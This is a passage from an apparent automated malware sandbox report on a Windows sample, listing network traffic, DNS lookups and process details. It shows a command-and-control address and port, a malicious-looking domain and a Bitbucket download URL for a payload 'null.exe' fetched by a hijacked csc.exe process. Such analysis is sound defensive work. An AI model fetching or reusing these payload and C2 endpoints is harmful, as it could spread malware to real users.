                                                                Dec 12, 2024 17:53:32.213706970 CET3020349874181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:36.316097975 CET3020349874181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:36.316171885 CET4987430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.316523075 CET4987430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.426747084 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.438411951 CET3020349874181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:36.549422979 CET3020349885181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:36.549514055 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.550360918 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.670087099 CET3020349885181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:36.670141935 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:36.791585922 CET3020349885181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:37.920850992 CET3020349885181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:37.921077967 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:37.921159029 CET4988530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:38.035967112 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:38.041160107 CET3020349885181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:38.191005945 CET3020349888181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:38.191329002 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:38.192028999 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:38.322134972 CET3020349888181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:38.322199106 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:38.441898108 CET3020349888181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:39.562650919 CET3020349888181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:39.562973022 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:39.562973022 CET4988830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:39.676505089 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:39.689939022 CET3020349888181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:39.796685934 CET3020349892181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:39.796756983 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:39.797740936 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:39.919392109 CET3020349892181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:39.919779062 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:40.045952082 CET3020349892181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:41.155446053 CET3020349892181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:41.155512094 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.155925035 CET4989230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.270420074 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.282465935 CET3020349892181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:41.395685911 CET3020349897181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:41.395999908 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.396701097 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.516565084 CET3020349897181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:41.516670942 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:41.637362957 CET3020349897181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:42.760343075 CET3020349897181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:42.760431051 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:42.760632038 CET4989730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:42.864186049 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:42.884094954 CET3020349897181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:42.987416983 CET3020349903181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:42.987518072 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:42.988444090 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:43.113948107 CET3020349903181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:43.114053965 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:43.234978914 CET3020349903181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:04.877846956 CET3020349903181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:04.877932072 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:04.878294945 CET4990330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:04.998512983 CET3020349903181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:05.006242037 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:05.126785994 CET3020349954181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:05.126933098 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:05.128463030 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:05.249134064 CET3020349954181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:05.249398947 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:05.369626045 CET3020349954181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:06.506442070 CET3020349954181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:06.506530046 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.506645918 CET4995430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.614114046 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.626409054 CET3020349954181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:06.734064102 CET3020349957181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:06.734611988 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.735291958 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.857206106 CET3020349957181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:06.858017921 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:06.978775024 CET3020349957181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:11.232099056 CET3020349957181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:11.232182980 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.232419014 CET4995730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.349663019 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.352925062 CET3020349957181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:11.469556093 CET3020349970181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:11.469660997 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.470628977 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.590617895 CET3020349970181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:11.590681076 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:11.713006020 CET3020349970181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:12.862992048 CET3020349970181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:12.863451958 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:12.863619089 CET4997030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:12.973509073 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:12.990272045 CET3020349970181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:13.095659018 CET3020349974181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:13.096645117 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:13.097316027 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:13.217242002 CET3020349974181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:13.221208096 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:13.341409922 CET3020349974181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:14.634933949 CET3020349974181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:14.635054111 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:14.635318995 CET4997430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:14.739237070 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:14.755101919 CET3020349974181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:14.859299898 CET3020349979181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:14.860558033 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:14.861371040 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:14.981117010 CET3020349979181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:14.981476068 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:15.102334976 CET3020349979181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:16.224427938 CET3020349979181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:16.224523067 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.224644899 CET4997930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.332654953 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.344307899 CET3020349979181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:16.453800917 CET3020349983181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:16.454063892 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.455020905 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.575097084 CET3020349983181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:16.575328112 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:16.695450068 CET3020349983181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:17.828965902 CET3020349983181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:17.829108000 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:17.829406977 CET4998330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:17.944762945 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:17.949136972 CET3020349983181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:18.065177917 CET3020349989181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:18.065275908 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:18.066123962 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:18.186060905 CET3020349989181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:18.188054085 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:18.309118032 CET3020349989181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:19.589436054 CET3020349989181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:19.589539051 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:19.589665890 CET4998930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:19.692394972 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:19.709598064 CET3020349989181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:19.814450026 CET3020349993181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:19.814672947 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:19.815383911 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:19.935441017 CET3020349993181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:19.936959028 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:20.059176922 CET3020349993181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:21.288325071 CET3020349993181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:21.288407087 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.294663906 CET4999330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.412540913 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.414438009 CET3020349993181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:21.532332897 CET3020349998181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:21.534089088 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.534823895 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.656207085 CET3020349998181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:21.656763077 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:21.777692080 CET3020349998181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:22.967035055 CET3020349998181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:22.967209101 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:22.967310905 CET4999830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:23.083198071 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:23.087074041 CET3020349998181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:23.203110933 CET3020350000181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:23.203203917 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:23.203918934 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:23.325700045 CET3020350000181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:23.325773001 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:23.447297096 CET3020350000181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:24.725979090 CET3020350000181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:24.726114988 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:24.726279020 CET5000030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:24.832828045 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:24.846043110 CET3020350000181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:24.952841043 CET3020350001181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:24.952931881 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:24.953735113 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:25.073771000 CET3020350001181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:25.073829889 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:25.193794012 CET3020350001181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:26.309708118 CET3020350001181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:26.309804916 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.309967995 CET5000130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.426516056 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.429636955 CET3020350001181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:26.546519995 CET3020350002181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:26.546603918 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.547584057 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.667273998 CET3020350002181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:26.667541027 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:26.787408113 CET3020350002181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:28.045767069 CET3020350002181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:28.045850992 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.046156883 CET5000230203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.161004066 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.166019917 CET3020350002181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:28.281965971 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:28.282093048 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.282907963 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.402731895 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:28.404150963 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:28.526982069 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:30.958331108 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:31.078224897 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:31.078294992 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:31.198278904 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:31.395211935 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:31.515388966 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:31.515455008 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:31.635400057 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:32.419152021 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:32.539139032 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:32.539210081 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:32.650357008 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:32.650470972 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:32.650599003 CET5000330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:54:32.659137011 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:32.770808935 CET3020350003181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:54:32.770827055 CET3020350003181.131.217.244192.168.2.10

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 12, 2024 17:52:48.897732019 CET6160753192.168.2.101.1.1.1
                                                                Dec 12, 2024 17:52:49.035656929 CET53616071.1.1.1192.168.2.10
                                                                Dec 12, 2024 17:52:51.005080938 CET6308253192.168.2.101.1.1.1
                                                                Dec 12, 2024 17:52:51.537967920 CET53630821.1.1.1192.168.2.10

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 12, 2024 17:52:48.897732019 CET192.168.2.101.1.1.10xe613Standard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:51.005080938 CET192.168.2.101.1.1.10xaa8cStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:43.138993025 CET1.1.1.1192.168.2.100xb1d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.21A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:49.035656929 CET1.1.1.1192.168.2.100xe613No error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:51.537967920 CET1.1.1.1192.168.2.100xaa8cNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:51.537967920 CET1.1.1.1192.168.2.100xaa8cNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                Dec 12, 2024 17:52:51.537967920 CET1.1.1.1192.168.2.100xaa8cNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • bitbucket.org

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1049772185.166.143.494437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-12 16:52:53 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                Host: bitbucket.org
                                                                Connection: Keep-Alive
                                                                2024-12-12 16:52:53 UTC5940INHTTP/1.1 302 Found
                                                                Date: Thu, 12 Dec 2024 16:52:53 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Server: AtlassianEdge
                                                                Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED]
                                                                Expires: Thu, 12 Dec 2024 16:52:53 GMT
                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                X-Used-Mesh: False
                                                                Vary: Accept-Language, Origin
                                                                Content-Language: en
                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                X-Dc-Location: Micros-3
                                                                X-Served-By: e5d3b6cac1b3
                                                                X-Version: b7875da02c7c
                                                                X-Static-Version: b7875da02c7c
                                                                X-Request-Count: 1730
                                                                X-Render-Time: 0.042934417724609375
                                                                X-B3-Traceid: 9e5c74897b2d4ad59de73c481b247b50
                                                                X-B3-Spanid: e38f05a36016315e
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.lau [TRUNCATED]
                                                                X-Usage-Quota-Remaining: 999100.123
                                                                X-Usage-Request-Cost: 912.77
                                                                X-Usage-User-Time: 0.018771
                                                                X-Usage-System-Time: 0.008612
                                                                X-Usage-Input-Ops: 0
                                                                X-Usage-Output-Ops: 0
                                                                Age: 0
                                                                X-Cache: MISS
                                                                X-Content-Type-Options: nosniff
                                                                X-Xss-Protection: 1; mode=block
                                                                Atl-Traceid: 9e5c74897b2d4ad59de73c481b247b50
                                                                Atl-Request-Id: 9e5c7489-7b2d-4ad5-9de7-3c481b247b50
                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=4,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1"
                                                                Connection: close


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:1
                                                                Start time:11:52:24
                                                                Start date:12/12/2024
                                                                Path:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\4JwhvqLe8n.exe"
                                                                Imagebase:0x400000
                                                                File size:2'652'160 bytes
                                                                MD5 hash:B58E300CA8077ADC4094E9044BCDBBC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:11:52:45
                                                                Start date:12/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                Imagebase:0x160000
                                                                File size:2'141'552 bytes
                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2630059901.0000000007DB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2630667108.0000000009540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:0.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:4.4%
                                                                  Total number of Nodes:341
